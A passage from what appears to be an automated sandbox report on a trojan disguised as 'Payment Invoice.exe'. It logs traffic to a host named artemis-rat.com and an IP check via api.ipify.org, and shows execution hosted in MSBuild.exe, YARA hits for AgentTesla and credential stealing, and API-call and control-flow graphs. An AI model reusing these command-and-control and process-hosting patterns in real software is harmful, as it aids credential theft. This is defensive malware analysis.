                                                                Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-8574530a6cd5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                2024-03-11 15:15:12 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.451252222.255.238.1594437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-11 15:15:16 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                2024-03-11 15:15:16 UTC192INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                2024-03-11 15:15:16 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.454268172.67.140.874437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-11 15:15:20 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                2024-03-11 15:15:21 UTC161INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                2024-03-11 15:15:21 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.455260172.67.74.15244342988C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-11 15:15:28 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2024-03-11 15:15:28 UTC211INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:28 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 13
                                                                Connection: close
                                                                Vary: Origin
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 862c8004e9d009f7-LAS
                                                                2024-03-11 15:15:28 UTC13INData Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 38
                                                                Data Ascii: 154.16.105.38


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:16:15:06
                                                                Start date:11/03/2024
                                                                Path:C:\Users\user\Desktop\Payment Invoice.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\Payment Invoice.exe
                                                                Imagebase:0x16314a20000
                                                                File size:43'008 bytes
                                                                MD5 hash:D1EEFB267668753DFF23CE54649B9696
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:16:15:24
                                                                Start date:11/03/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                Imagebase:0x4b0000
                                                                File size:262'432 bytes
                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3068273455.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:6
                                                                Start time:16:15:24
                                                                Start date:11/03/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                                Imagebase:0xd50000
                                                                File size:262'432 bytes
                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:16:15:26
                                                                Start date:11/03/2024
                                                                Path:C:\Windows\System32\WerFault.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7076 -s 101532
                                                                Imagebase:0x7ff6441c0000
                                                                File size:570'736 bytes
                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:10.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:119
                                                                  Total number of Limit Nodes:15
                                                                  execution_graph 39045 60f6f48 DuplicateHandle 39046 60f6fde 39045->39046 39047 c60848 39049 c6084e 39047->39049 39048 c6091b 39049->39048 39053 60f5be8 39049->39053 39057 60f5bf8 39049->39057 39061 c6137f 39049->39061 39054 60f5bf8 39053->39054 39068 60f5414 39054->39068 39058 60f5c07 39057->39058 39059 60f5414 2 API calls 39058->39059 39060 60f5c28 39059->39060 39060->39049 39062 c61377 39061->39062 39064 c61383 39061->39064 39062->39049 39063 c61484 39063->39049 39064->39063 39148 c67d54 39064->39148 39152 c67ea8 39064->39152 39159 c67d90 39064->39159 39069 60f541f 39068->39069 39072 60f6b7c 39069->39072 39071 60f75ae 39074 60f6b87 39072->39074 39073 60f7cd4 39073->39071 39074->39073 39076 60f9960 39074->39076 39077 60f9981 39076->39077 39078 60f99a5 39077->39078 39081 60f9b00 39077->39081 39085 60f9b10 39077->39085 39078->39073 39082 60f9b10 39081->39082 39083 60f9b56 39082->39083 39089 60f88ac 39082->39089 39083->39078 39086 60f9b1d 39085->39086 39087 60f9b56 39086->39087 39088 60f88ac 2 API calls 39086->39088 39087->39078 39088->39087 39090 60f88b7 39089->39090 39092 60f9bc8 39090->39092 39093 60f88e0 39090->39093 39094 60f88eb 39093->39094 39100 60f88f0 39094->39100 39096 60f9c37 39104 60fecd0 39096->39104 39114 60fecb8 39096->39114 39097 60f9c71 39097->39092 39103 60f88fb 39100->39103 39101 60fb040 39101->39096 39102 60f9960 2 API calls 39102->39101 39103->39101 39103->39102 39106 60fed01 39104->39106 39107 60fed4d 39104->39107 39105 60fed0d 39105->39097 39106->39105 39111 60fecb8 2 API calls 39106->39111 39112 60fecd0 2 API calls 39106->39112 39124 60fef38 39106->39124 39128 60fef48 39106->39128 39107->39097 39132 60ff388 39107->39132 39108 60fef52 39108->39097 39111->39107 39112->39107 39116 60fecd0 39114->39116 39115 60fed0d 39115->39097 39116->39115 39117 60fed4d 39116->39117 39119 60fef38 2 API calls 39116->39119 39120 60fef48 2 API calls 39116->39120 39121 60fecb8 2 API calls 39116->39121 39122 60fecd0 2 API calls 39116->39122 39117->39097 39123 60ff388 2 API calls 39117->39123 39118 60fef52 39118->39097 39119->39117 39120->39117 39121->39117 39122->39117 39123->39118 39125 60fef48 39124->39125 39127 60ff388 2 API calls 39125->39127 39126 60fef52 39126->39107 39127->39126 39129 60fef4c 39128->39129 39131 60ff388 2 API calls 39129->39131 39130 60fef52 39130->39107 39131->39130 39133 60ff3a9 39132->39133 39135 60ff3cc 39132->39135 39133->39135 39140 60ff620 39133->39140 39144 60ff630 39133->39144 39134 60ff3c4 39134->39135 39136 60ff5d0 GetModuleHandleW 39134->39136 39135->39108 39137 60ff5fd 39136->39137 39137->39108 39141 60ff61c 39140->39141 39143 60ff669 39140->39143 39141->39140 39142 60fefc0 LoadLibraryExW 39141->39142 39141->39143 39142->39143 39143->39134 39145 60ff644 39144->39145 39146 60ff669 39145->39146 39147 60fefc0 LoadLibraryExW 39145->39147 39146->39134 39147->39146 39149 c67d1f 39148->39149 39149->39148 39150 c67f12 39149->39150 39163 c6f3df 39149->39163 39150->39064 39153 c67eb2 39152->39153 39154 c67ecc 39153->39154 39157 611fa98 GlobalMemoryStatusEx 39153->39157 39158 611faa8 GlobalMemoryStatusEx 39153->39158 39155 c67f12 39154->39155 39156 c6f3df GlobalMemoryStatusEx 39154->39156 39155->39064 39156->39155 39157->39154 39158->39154 39161 c67da6 39159->39161 39160 c67f12 39160->39064 39161->39160 39162 c6f3df GlobalMemoryStatusEx 39161->39162 39162->39160 39164 c6f3ea 39163->39164 39168 611fa98 39164->39168 39172 611faa8 39164->39172 39165 c6f3f1 39165->39150 39169 611fabd 39168->39169 39170 611fcd2 39169->39170 39171 611fce9 GlobalMemoryStatusEx 39169->39171 39170->39165 39171->39169 39174 611fabd 39172->39174 39173 611fcd2 39173->39165 39174->39173 39175 611fce9 GlobalMemoryStatusEx 39174->39175 39175->39174 39176 60f6d00 39177 60f6d46 GetCurrentProcess 39176->39177 39179 60f6d98 GetCurrentThread 39177->39179 39180 60f6d91 39177->39180 39181 60f6dce 39179->39181 39182 60f6dd5 GetCurrentProcess 39179->39182 39180->39179 39181->39182 39185 60f6e0b 39182->39185 39183 60f6e33 GetCurrentThreadId 39184 60f6e64 39183->39184 39185->39183 39186 60f30f0 39187 60f30fe 39186->39187 39188 60f3080 SetWindowsHookExA 39186->39188 39190 60f30c2 39188->39190

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 127 61130a8-61130c9 128 61130cb-61130ce 127->128 129 61130d0-61130ef 128->129 130 61130f4-61130f7 128->130 129->130 131 6113898-611389a 130->131 132 61130fd-611311c 130->132 133 61138a1-61138a4 131->133 134 611389c 131->134 140 6113135-611313f 132->140 141 611311e-6113121 132->141 133->128 137 61138aa-61138b3 133->137 134->133 144 6113145-6113154 140->144 141->140 142 6113123-6113133 141->142 142->144 253 6113156 call 61138c0 144->253 254 6113156 call 61138c8 144->254 146 611315b-6113160 147 6113162-6113168 146->147 148 611316d-611344a 146->148 147->137 169 6113450-61134ff 148->169 170 611388a-6113897 148->170 179 6113501-6113526 169->179 180 6113528 169->180 182 6113531-6113544 179->182 180->182 184 6113871-611387d 182->184 185 611354a-611356c 182->185 184->169 186 6113883 184->186 185->184 188 6113572-611357c 185->188 186->170 188->184 189 6113582-611358d 188->189 189->184 190 6113593-6113669 189->190 202 6113677-61136a7 190->202 203 611366b-611366d 190->203 207 61136b5-61136c1 202->207 208 61136a9-61136ab 202->208 203->202 209 6113721-6113725 207->209 210 61136c3-61136c7 207->210 208->207 211 6113862-611386b 209->211 212 611372b-6113767 209->212 210->209 213 61136c9-61136f3 210->213 211->184 211->190 223 6113775-6113783 212->223 224 6113769-611376b 212->224 220 6113701-611371e 213->220 221 61136f5-61136f7 213->221 220->209 221->220 227 6113785-6113790 223->227 228 611379a-61137a5 223->228 224->223 227->228 231 6113792 227->231 232 61137a7-61137ad 228->232 233 61137bd-61137ce 228->233 231->228 234 61137b1-61137b3 232->234 235 61137af 232->235 237 61137d0-61137d6 233->237 238 61137e6-61137f2 233->238 234->233 235->233 239 61137d8 237->239 240 61137da-61137dc 237->240 242 61137f4-61137fa 238->242 243 611380a-611385b 238->243 239->238 240->238 244 61137fc 242->244 245 61137fe-6113800 242->245 243->211 244->243 245->243 253->146 254->146
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                  • API String ID: 0-2331353128
                                                                  • Opcode ID: 8961a4b3d846bf839f6dd12e9ee45086b0c0895f2c34bf3ac6d8ccdda760b78e
                                                                  • Instruction ID: 18e07896dbc7c8c6b2363d4681be24c51819b68a4b71d7b7a3c378f63ee0e344
                                                                  • Opcode Fuzzy Hash: 8961a4b3d846bf839f6dd12e9ee45086b0c0895f2c34bf3ac6d8ccdda760b78e
                                                                  • Instruction Fuzzy Hash: ED320E31E10719CFCB55EF75C85459DB7B2FFC9300F2186AAD419AB264EB309A85CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 841 6117dc0-6117dde 842 6117de0-6117de3 841->842 843 6117de5-6117dff 842->843 844 6117e04-6117e07 842->844 843->844 845 6117e14-6117e17 844->845 846 6117e09-6117e13 844->846 847 6117e19-6117e35 845->847 848 6117e3a-6117e3d 845->848 847->848 850 6117e54-6117e56 848->850 851 6117e3f-6117e4d 848->851 852 6117e58 850->852 853 6117e5d-6117e60 850->853 856 6117e66-6117e7c 851->856 859 6117e4f 851->859 852->853 853->842 853->856 861 6117e82-6117e8b 856->861 862 6118097-61180a1 856->862 859->850 863 6117e91-6117eae 861->863 864 61180a2-61180b4 861->864 873 6118084-6118091 863->873 874 6117eb4-6117edc 863->874 867 61180b6-61180c6 864->867 868 61180cb-61180d7 864->868 867->868 869 61180d9-61180dc 868->869 871 6118311-6118314 869->871 872 61180e2-61180f1 869->872 875 6118337-611833a 871->875 876 6118316-6118332 871->876 881 6118110-6118154 872->881 882 61180f3-611810e 872->882 873->861 873->862 874->873 889 6117ee2-6117eeb 874->889 877 6118340-611834c 875->877 878 61183e5-61183e7 875->878 876->875 888 6118357-6118359 877->888 884 61183e9 878->884 885 61183ee-61183f1 878->885 900 61182e5-61182fb 881->900 901 611815a-611816b 881->901 882->881 884->885 885->869 886 61183f7-6118400 885->886 890 6118371-6118375 888->890 891 611835b-6118361 888->891 889->864 895 6117ef1-6117f0d 889->895 898 6118383 890->898 899 6118377-6118381 890->899 896 6118363 891->896 897 6118365-6118367 891->897 910 6117f13-6117f3d 895->910 911 6118072-611807e 895->911 896->890 897->890 902 6118388-611838a 898->902 899->902 900->871 912 6118171-611818e 901->912 913 61182d0-61182df 901->913 906 611839b-61183d4 902->906 907 611838c-611838f 902->907 906->872 928 61183da-61183e4 906->928 907->886 926 6117f43-6117f6b 910->926 927 6118068-611806d 910->927 911->873 911->889 912->913 921 6118194-611828a call 61165d8 912->921 913->900 913->901 976 6118298 921->976 977 611828c-6118296 921->977 926->927 934 6117f71-6117f9f 926->934 927->911 934->927 940 6117fa5-6117fae 934->940 940->927 941 6117fb4-6117fe6 940->941 949 6117ff1-611800d 941->949 950 6117fe8-6117fec 941->950 949->911 951 611800f-6118066 call 61165d8 949->951 950->927 952 6117fee 950->952 951->911 952->949 978 611829d-611829f 976->978 977->978 978->913 979 61182a1-61182a6 978->979 980 61182b4 979->980 981 61182a8-61182b2 979->981 982 61182b9-61182bb 980->982 981->982 982->913 983 61182bd-61182c9 982->983 983->913
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3075739112.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_6110000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 3154b967e349907d99f90bbe16569c8faf1817937e544e6331a4e033e5f9c2c4
                                                                  • Instruction ID: b373ed6d8455aee275ad03995274718bce909a2f11c9b1c02ecea34df38ccc0a
                                                                  • Opcode Fuzzy Hash: 3154b967e349907d99f90bbe16569c8faf1817937e544e6331a4e033e5f9c2c4
                                                                  • Instruction Fuzzy Hash: D8028B30B012198FDB95DF64D590AAEB7E2FB84310F24C969E805DB395DB35ED82CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1117 c6e291-c6e2b2 1118 c6e316-c6e31d 1117->1118 1119 c6e2b4-c6e2f3 1117->1119 1126 c6e2f5-c6e307 1119->1126 1127 c6e31e-c6e385 1119->1127 1133 c6e30e 1126->1133 1137 c6e387-c6e389 1127->1137 1138 c6e38e-c6e39e 1127->1138 1133->1118 1139 c6e62d-c6e634 1137->1139 1140 c6e3a5-c6e3b5 1138->1140 1141 c6e3a0 1138->1141 1143 c6e614-c6e622 1140->1143 1144 c6e3bb-c6e3c9 1140->1144 1141->1139 1147 c6e635-c6e6ae 1143->1147 1149 c6e624-c6e628 call c67b00 1143->1149 1144->1147 1148 c6e3cf 1144->1148 1148->1147 1150 c6e486-c6e4a7 1148->1150 1151 c6e5c7-c6e5e2 call c60350 1148->1151 1152 c6e5e4-c6e606 1148->1152 1153 c6e460-c6e481 1148->1153 1154 c6e56e-c6e594 1148->1154 1155 c6e4ac-c6e4cd 1148->1155 1156 c6e52c-c6e569 1148->1156 1157 c6e3ed-c6e40e 1148->1157 1158 c6e608-c6e612 1148->1158 1159 c6e3d6-c6e3e8 1148->1159 1160 c6e4d2-c6e4fa 1148->1160 1161 c6e413-c6e435 1148->1161 1162 c6e4ff-c6e527 1148->1162 1163 c6e43a-c6e45b 1148->1163 1164 c6e599-c6e5c5 1148->1164 1149->1139 1150->1139 1151->1139 1152->1139 1153->1139 1154->1139 1155->1139 1156->1139 1157->1139 1158->1139 1159->1139 1160->1139 1161->1139 1162->1139 1163->1139 1164->1139
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Xhq$$dq
                                                                  • API String ID: 0-4001282582
                                                                  • Opcode ID: f1370dfab8fb58d9fb5dc5cfe7a65380762550ca1de0a9eeffe53fd4bc19c000
                                                                  • Instruction ID: 74d316611fc936eff1b4f4a75579a7994f01dfba0ebd49c6aff7cc24c64013c4
                                                                  • Opcode Fuzzy Hash: f1370dfab8fb58d9fb5dc5cfe7a65380762550ca1de0a9eeffe53fd4bc19c000
                                                                  • Instruction Fuzzy Hash: 1BB1C774B042589FCB18EB79989467E7BA7BFC8710B15846EE447EB384CE34DC029792
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3067169390.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_c60000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53161d3d91f4abbec33edbcd45d8b39b6de1768151a5693f891eb8cf4627ed9c
                                                                  • Instruction ID: 8d021394ece3c53d12563dc3b386be5df9a206a5eee408d2d5cc094fbb548f74
                                                                  • Opcode Fuzzy Hash: 53161d3d91f4abbec33edbcd45d8b39b6de1768151a5693f891eb8cf4627ed9c
                                                                  • Instruction Fuzzy Hash: 7653E831D10B1A8EDB11EF68C990699F7B1FF99300F15D79AE4586B221EB70AAC4CF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1836 61155e0-61155fd 1837 61155ff-6115602 1836->1837 1838 6115604-611560a 1837->1838 1839 611563a-611563d 1837->1839 1842 6115610-6115618 1838->1842 1843 61157b4-61157e3 1838->1843 1840 6115645-6115648 1839->1840 1841 611563f-6115640 1839->1841 1844 611564a-611564d 1840->1844 1845 611567c-6115682 1840->1845 1841->1840 1842->1843 1846 611561e-611562b 1842->1846 1859 61157ed-61157f0 1843->1859 1848 611564f-6115653 1844->1848 1849 611565e-6115661 1844->1849 1851 6115684 1845->1851 1852 611569f-61156a9 1845->1852 1846->1843 1847 6115631-6115635 1846->1847 1847->1839 1853 61157a6-61157b3 1848->1853 1854 6115659 1848->1854 1855 6115663-6115672 1849->1855 1856 6115677-611567a 1849->1856 1857 6115689-611568c 1851->1857 1858 61156b0-61156b2 1852->1858 1854->1849 1855->1856 1856->1845 1856->1857 1860 611569a-611569d 1857->1860 1861 611568e-6115695 1857->1861 1862 61156b7-61156ba 1858->1862 1864 6115812-6115815 1859->1864 1865 61157f2-61157f6 1859->1865 1860->1852 1860->1862 1861->1860 1868 61156c6-61156c9 1862->1868 1869 61156bc-61156c5 1862->1869 1866 6115837-611583a 1864->1866 1867 6115817-611581b 1864->1867 1870 61157fc-6115804 1865->1870 1871 61158de-611591c 1865->1871 1874 6115852-6115855 1866->1874 1875 611583c-611584d 1866->1875 1867->1871 1873 6115821-6115829 1867->1873 1876 61156e6-61156e9 1868->1876 1877 61156cb-61156e1 1868->1877 1870->1871 1872 611580a-611580d 1870->1872 1884 611591e-6115921 1871->1884 1872->1864 1873->1871 1879 611582f-6115832 1873->1879 1880 6115873-6115876 1874->1880 1881 6115857-611585b 1874->1881 1875->1874 1882 61156f0-61156f3 1876->1882 1883 61156eb-61156ed 1876->1883 1877->1876 1879->1866 1890 6115880-6115883 1880->1890 1891 6115878-611587f 1880->1891 1881->1871 1887 6115861-6115869 1881->1887 1888 61156f5-6115702 1882->1888 1889 6115707-611570a 1882->1889 1883->1882 1896 6115923-6115934 1884->1896 1897 611593f-6115942 1884->1897 1887->1871 1898 611586b-611586e 1887->1898 1888->1889 1894 611573d-6115743 1889->1894 1895 611570c-611570f 1889->1895 1892 6115885-6115889 1890->1892 1893 611589d-61158a0 1890->1893 1892->1871 1899 611588b-6115893 1892->1899 1902 61158b1-61158b4 1893->1902 1903 61158a2-61158ac 1893->1903 1894->1838 1906 6115749 1894->1906 1900 6115711-6115717 1895->1900 1901 611571e-6115721 1895->1901 1919 6115a03-6115a0a 1896->1919 1920 611593a 1896->1920 1904 6115944-6115957 1897->1904 1905 611595a-611595d 1897->1905 1898->1880 1899->1871 1908 6115895-6115898 1899->1908 1909 6115730-6115733 1900->1909 1910 6115719 1900->1910 1912 6115723-6115726 1901->1912 1913 611572b-611572e 1901->1913 1914 61158c4-61158c6 1902->1914 1915 61158b6-61158bd 1902->1915 1903->1902 1916 611597b-611597e 1905->1916 1917 611595f-6115970 1905->1917 1918 611574e-6115751 1906->1918 1908->1893 1921 6115738-611573b 1909->1921 1910->1901 1912->1913 1913->1909 1913->1921 1930 61158c8 1914->1930 1931 61158cd-61158d0 1914->1931 1928 61158d6-61158dd 1915->1928 1929 61158bf 1915->1929 1925 6115980-6115991 1916->1925 1926 6115998-611599b 1916->1926 1917->1919 1940 6115976 1917->1940 1923 6115753-6115768 1918->1923 1924 611576d-6115770 1918->1924 1932 6115a0f-6115a12 1919->1932 1920->1897 1921->1894 1921->1918 1923->1924 1934 6115772-611578f 1924->1934 1935 6115794-6115796 1924->1935 1925->1904 1950 6115993 1925->1950 1936 61159a9-61159ac 1926->1936 1937 